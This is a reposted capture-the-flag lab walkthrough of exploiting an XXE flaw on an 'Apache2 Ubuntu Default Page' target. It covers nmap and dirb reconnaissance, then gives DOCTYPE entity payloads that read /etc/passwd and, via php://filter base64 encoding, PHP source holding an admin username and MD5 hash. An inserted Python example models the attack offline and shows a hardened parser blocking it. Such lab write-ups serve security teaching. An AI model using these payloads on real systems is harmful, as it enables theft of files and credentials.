
Apache2-XXE vulnerability penetration

2022-08-03 05:39:00 A piece of paper - barren

Preface

The "Apache2 Ubuntu Default Page" target hosts a page with an XXE (XML External Entity) vulnerability. How do we find and exploit the XXE flaw, and recover the flag?


1. nmap scan

Start with information gathering; nmap is the usual tool.
The target is at 10.40.2.116 and is reachable.
From Kali, scan the target for open ports and service information.
Only port 80 is open, so there is no other service to attack; the web application is the only attack surface.
Next, brute-force hidden files and directories with dirb:
dirb http://10.40.2.116 /usr/share/wordlists/dirb/big.txt -X .php,.txt
The scan turns up a robots.txt file.
Open it in the browser.
It has content:
it lists paths that exist on the server.

2. Using the information obtained

robots.txt reveals an /xxe directory and an admin.php.
Take a look at both.
/xxe is a login page.
/xxe/admin.php is also a login page.
Submit the /xxe login form with Burp Suite intercepting, and inspect the request.

The data is submitted by POST, and the body at the bottom of the request is an XML document, which is the first hint that the server parses XML.
Send the request to Repeater and resubmit it.
Notice that the value of the ad element is reflected in the response.
If ad can be made to point at another file, this is very likely an XXE vulnerability.


3. XXE exploitation

Craft a DOCTYPE that defines ad as an external entity pointing at /etc/passwd; the existing reference to the entity in the body is then expanded with the file contents, and we check whether it is echoed back:

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///etc/passwd">
]>

The response contains the contents of the file, which confirms the XXE vulnerability.
Next, try reading the site's own source files.
Apache's default document root is /var/www/html/, so the login page should be at /var/www/html/xxe/index.php:

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///var/www/html/xxe/index.php">
]>

This time nothing comes back. PHP source is not well-formed XML (HTML with unclosed tags, bare & characters, and so on), so the parser rejects the entity instead of echoing it.
Use the php://filter wrapper to base64-encode the file on the way in; base64 is plain text that the parser accepts without complaint:

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/index.php">
]>

Decode the response in Burp's Decoder (base64).
That yields the source of the login page, but there is nothing useful in it.
There is still /xxe/admin.php, which we have not read yet.
Read it the same way:
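The following is an added example, not code from the original post, that models the whole exchange above offline: a POST body in which the ad entity is reflected, a DOCTYPE that redefines ad as a file:// external entity, the failure when the target file is PHP source rather than well-formed XML, the base64 workaround, and the same request against a hardened parser. Everything about the target is assumed: the element names <login>, <user>, <pass> and <ad> (the post never shows the request body), the sample file contents, Python's xml.sax as a stand-in for the target's PHP/libxml parser, and a base64 copy of the file standing in for php://filter, which Python does not have.

```python
"""Added example: local model of the /xxe login handler and the XXE attack on it.

Assumptions (none of this is on the original page): element names, sample file
contents, Python's xml.sax standing in for PHP/libxml, and a base64-encoded copy
of the file standing in for php://filter/read=convert.base64-encode.
"""
import base64
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges

# Constructed sample files standing in for /etc/passwd and /var/www/html/xxe/admin.php.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"
SAMPLE_ADMIN_PHP = (
    '<?php\n'
    '$user = "admin";\n'
    '$hash = "d41d8cd98f00b204e9800998ecf8427e";  // constructed hash, not the target\'s\n'
    '?>\n'
    '<form method="post" action="admin.php?a=1&b=2">\n'  # bare '&' in an attribute: first well-formedness error
    '<input name="user">\n'
    '</form>\n'
)


def xxe_payload(target_url):
    """Build the POST body the way the post does in Repeater: a DOCTYPE that
    defines `ad` as an external entity, with &ad; referenced in the body."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE test [\n'
        f'<!ENTITY ad SYSTEM "{target_url}">\n'
        ']>\n'
        '<login><user>guest</user><pass>guest</pass><ad>&ad;</ad></login>'
    ).encode()


class _AdCollector(xml.sax.ContentHandler):
    """Collects the text of <ad>, which the vulnerable page echoes back."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, name, attrs):
        self._inside = name == "ad"

    def endElement(self, name):
        if name == "ad":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


def server_echo(body, resolve_external):
    """Model of the target's XML handling. Returns the reflected <ad> text, or None
    when the parser rejected the document (what the post sees as 'nothing comes back').
    resolve_external=True is the vulnerable configuration; False is the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = _AdCollector()
    parser.setContentHandler(handler)
    try:
        parser.parse(io.BytesIO(body))
    except xml.sax.SAXException:
        return None
    return "".join(handler.parts)


def make_lab():
    """Write the constructed files to a temp dir and return file:// URLs for them."""
    d = pathlib.Path(tempfile.mkdtemp(prefix="xxe_lab_"))
    passwd, admin, admin_b64 = d / "passwd", d / "admin.php", d / "admin.php.b64"
    passwd.write_bytes(SAMPLE_PASSWD.encode())
    admin.write_bytes(SAMPLE_ADMIN_PHP.encode())
    admin_b64.write_bytes(base64.b64encode(admin.read_bytes()))  # stands in for php://filter output
    return {"passwd": passwd.as_uri(), "admin": admin.as_uri(), "admin_b64": admin_b64.as_uri()}


def run_attack():
    """The three requests from the post, plus the first one against a hardened parser."""
    lab = make_lab()
    leaked_passwd = server_echo(xxe_payload(lab["passwd"]), resolve_external=True)
    direct_php = server_echo(xxe_payload(lab["admin"]), resolve_external=True)   # None: not well-formed
    filtered = server_echo(xxe_payload(lab["admin_b64"]), resolve_external=True)  # base64 text parses fine
    recovered_php = base64.b64decode(filtered).decode() if filtered else None     # Burp Decoder step
    hardened = server_echo(xxe_payload(lab["passwd"]), resolve_external=False)    # entity never resolved
    return {"passwd": leaked_passwd, "direct_php": direct_php,
            "recovered_php": recovered_php, "hardened": hardened}


if __name__ == "__main__":
    for key, value in run_attack().items():
        print(f"== {key} ==\n{value}\n")
```

The hardened case is the defence the post does not spell out: with external general entities disabled (the default for xml.sax since Python 3.7.1, and the effect of not passing LIBXML_NOENT on the PHP side) the &ad; reference expands to nothing, so the same payload leaks nothing.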

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/admin.php">
]>

base64-decoding the response yields the key information:
a username, an MD5 password hash, and a mention of the flag.
MD5 is a hash, not encryption, so the password is recovered by lookup rather than decryption; it turns out to be [email protected]
Enter the username and password.
The login succeeds, but clicking the flag link reports that the flag is not here.
Check whether it is under the /xxe directory instead.
Viewing the page source reveals the flag.

Summary

The above is one walkthrough of this target; the general approach is:
1. Information gathering with nmap and dirb
2. Intercept requests with Burp Suite and look for an exploitable vulnerability
3. Exploit the identified vulnerability to read sensitive files
4. A simple code audit to obtain the flag
Hope this helps.

Original site

Copyright notice
This article was written by [A piece of paper - barren]; please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/215/202208030510044052.html